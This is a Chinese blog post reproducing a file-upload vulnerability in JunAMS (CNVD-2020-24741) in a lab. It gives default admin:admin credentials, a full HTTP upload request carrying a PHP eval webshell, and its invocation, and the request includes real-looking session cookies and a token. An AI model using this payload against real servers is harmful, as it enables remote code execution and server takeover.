junams 文件上传 (CNVD-2020-24741)

最新推荐文章于 2024-06-14 14:08:33 发布
最新推荐文章于 2024-06-14 14:08:33 发布
阅读量225 收藏 3
点赞数 1
分类专栏: 漏洞复现 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51780583/article/details/139007553
版权

漏洞环境搭建:vulfocus

发现这个页面后,通过访问IP:Port/admin.php,登录后台

通过默认用户名密码admin:admin进行登录

登录后台后,主要思路就是找到网站的文件上传点,然后去上传一句话木马,或者找到命令执行的地方去拿到网站服务器的shell。

最后在”系统设置->版本管理->添加“处找到图片上传点,直接burp抓包当前页面,然后上传文件请求包,请求包内容如下

POST //admin.php/common/add_images.html HTTP/1.1
Host: 47.109.191.51:10001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326774743432415414462475084350
Content-Length: 269
Origin: http://47.109.191.51:10001
Connection: close
Referer: http://47.109.191.51:10001/admin.php/edition/add.html
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636957776,1637035618,1637078936,1637219652; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1636704940,1636709021,1636825689,1637222671; _ga=GA1.2.744261971.1636781886; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1637221849; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM3MzA2MDA0LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.4Gr7Mkd6jMvSpaNITDQoww0jUnSP1d59O34IpzyDpmI; PHPSESSID=7jrca24napuo1umgs5s58dfhvu; _gid=GA1.2.277758474.1637219810; ktqnjecmsdodbdata=empirecms; ktqnjeloginlic=empirecmslic; ktqnjloginadminstyleid=1; ktqnjlogintime=1637222551; ktqnjtruelogintime=1637222430; ktqnjloginuserid=1; ktqnjloginusername=admin; ktqnjloginrnd=5I62uWWbyxT9vB9Fi6FU; ktqnjloginlevel=1; ktqnjloginecmsckpass=35f1e6e02526a8193d735f89d9093f80; ktqnjloginecmsckfrnd=gkgk52G7rpQ6xWOHlfLWxgdFpG9; ktqnjloginecmsckfdef=N0VHyuu3ljnoPVbceYkXaX; ktqnjemecOYNqOjnu=BXWggMbbslguQiExvN; Hm_lpvt_b5514a35664fd4ac6a893a1e56956c97=1637222890; thinkphp_show_page_trace=0|0; eth0_time=1637226896; eth0_num=0; eth0=249.118; login_auto=YXs3g0Y%3D%7C0e2c7f3efd15db77ba3f2ec9ab35f8347cb5be0d
Upgrade-Insecure-Requests: 1

-----------------------------326774743432415414462475084350
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/octet-stream

<?php eval($_REQUEST[1]); ?> 
-----------------------------326774743432415414462475084350--

上传成功

然后访问:http://47.109.191.51:10001/public\/edit\/20240411\/8817b191ad1f76ad48908b33832e0b5b.php?1=phpinfo();

既然访问成功,那么直接使用蚁剑连接。

打你的小脑斧
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -...
junams 文件上传 (CNVD-2020-24741)
小小猪的博客
12-30 1824
junams 文件上传 (CNVD-2020-24741) 漏洞简介: JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 影响版本: JunAMS v1.2.1.20190403 环境搭建: 在线环境 地址 漏洞复现: 访问后台 账号admin密码admin 点击系统设置->版本设置->图片上传 burp进行抓包,可以看到有上传功能 分析common...
junams 文件上传CNVD-2020-24741)复现
YouthBelief的博客
11-18 2668
所有文章,仅供安全研究与学习之用,后果自负! junams 文件上传CNVD-2020-24741junams 文件上传CNVD-2020-24741)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复总结 junams 文件上传CNVD-2020-24741) 0x01 漏洞描述 JunAMS是一款以ThinkPHP为框架的开源内容管理系统。 JunAMS内容管理系统存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。 后台路径 /admin.p
JunAMS文件上传(CNVD-2020-24741)
m0_65150886的博客
02-21 919
JunAMS junAMS 1.2.1.20190403版本存在文件上传漏洞,攻击者可利用该漏洞上传webshell,获取服务器权限。2.访问http://ip:port/admin.php,进入后台登录页面。后台路径 /admin.php 账号密码 admin:admin。3.输入账号密码进行登录,若显示系统正在处理中,点击F5刷新页面。JunAMS是一款以ThinkPHP为框架的开源内容管理系统。1.访问http://ip:port,出现如下页面,开始实验。4.通过burp发送如下poload。
SSM整合之文件上传---MultipartFile-(绝对详细)
amspony的博客
09-19 1286
项目中用到的 文件上传 添加到 数据库 保存路径 注意,上传功能,需要引入两个依赖 <!-- 文件上传的jar包 --> <dependency> <groupId>commons-io</groupId> <artifactId>commons-io</artifactId> <version>2.4</version> </dependency
java网络编程----控制台版文件上传(版本二)
amspony的博客
04-13 106
package com.itheima.demo05; import java.io.BufferedReader; import java.io.FileInputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.Socket; /** * @author Mr.liu * @date 2021年04月13日 17:00 */ public class Client {
java网络编程----控制台版文件上传(版本一)
amspony的博客
04-13 148
package com.itheima.demo04; import java.io.*; import java.net.Socket; /** * @author Mr.liu * @date 2021年04月13日 16:07 */ public class Client { //文件上传 public static void main(String[] args) throws IOException { System.out.println("准备与服务器
2020-04-11
weixin_46988600的博客
04-11 97
用我最宝贵的三年去学黑客技术 # 不要怂╯▂╰ List itemwww .jie feng 6.com A </title > </head > ` ` $ 第一次写 ...
CNVD-2020-10487.7z
09-19
CNVD-2020-10487 tomcat漏洞POC
CNVD-2020-10487-Tomcat-Ajp-lfi_exp_
09-29
CNVD-2020-10487-Tomcat-Ajp-lfi
网络安全在个人生活中具体有哪些常见的应用场景?
2301_79955948的博客
06-10 471
通过上述场景可以看出,网络安全在个人生活中扮演着至关重要的角色,它不仅关系到个人隐私和财产安全,也影响到日常生活的方方面面。7. 物联网设备安全网络安全可以保护智能家居、智能设备等物联网设备的安全,避免网络攻击和数据泄露。5. 远程办公和学习:网络安全可以保障企业和学校网络系统的安全和稳定性,避免数据泄露和网络攻击。6. 云存储和备份:网络安全可以保护云存储服务和备份数据的安全,防止黑客攻击和数据泄露。8. 移动设备安全网络安全可以保护移动设备的安全和数据隐私,防止恶意软件和网络攻击。
美创科技入选“2024网络安全提供商创新排行榜”
美创科技的博客
06-12 357
数据安全的发展离不开源源不断的创新推动。美创科技始终紧跟数据安全发展趋势,坚持以“新产品新技术研发、新理念新框架构建、新服务新咨询探索、新场景新方案打造”四个方向创新发展,更好地帮助各行业用户解决应对数字化时代下的数据安全挑战与难题。近日,DBC德本咨询公布了“2024网络安全提供商创新排行榜”,美创科技凭借近20年的。此次,与360、华为、腾讯等互联网、网络安全头部厂商并肩上榜,是行业对美创的再次认可。创新耕耘,荣誉上榜。
经纬恒润助力微宏动力荣获ISO/SAE 21434网络安全流程认证证书
最新发布
经纬恒润的官方博客
06-14 485
近日,经纬恒润与微宏动力合作的网络安全开发及认证项目顺利完成了阶段性里程碑。
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1476
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。
提升网络安全韧性:从基础防护开始
Dexun_chuqi的博客
06-13 600
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
cnvd-2020-10487-tomcat-ajp-lfi
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。 攻击者可以通过将恶意的AJP请求发送到Tomcat服务器的8009端口来利用该漏洞。这些请求可以指定要读取的文件路径。由于Tomcat默认配置下AJP协议启用且未进行适当的安全限制,攻击者可以通过这个漏洞读取和执行服务器上的任意文件。 为了防止受到cnvd-2020-10487-tomcat-ajp-lfi漏洞的攻击,可以采取以下措施: 1. 禁用或限制AJPS协议的使用:可以通过修改Tomcat的配置文件来禁用或限制AJPS协议的使用。将AJP协议暴露在公共网络上可能会使服务器容易受到攻击。 2. 更新Tomcat版本:及时安装Tomcat的安全更新和补丁,以保持服务器的安全性和稳定性。 3. 配置Tomcat访问控制:通过配置Tomcat的访问控制策略,限制外部访问与敏感文件相关的路径。 4. 使用防火墙和入侵检测系统(IDS):配置防火墙和IDS以监控和检测异常的网络活动,并及时阻止和警示可疑的AJP请求。 5. 最小权限原则:确保服务器上的所有账户和进程都具有最小权限。这样,即使攻击者成功利用了漏洞,也能够最大限度地减小攻击的影响范围。 综上所述,cnvd-2020-10487-tomcat-ajp-lfi是一种危险的漏洞,但通过采取适当的防护措施,我们可以提高服务器的安全性,避免受到该漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值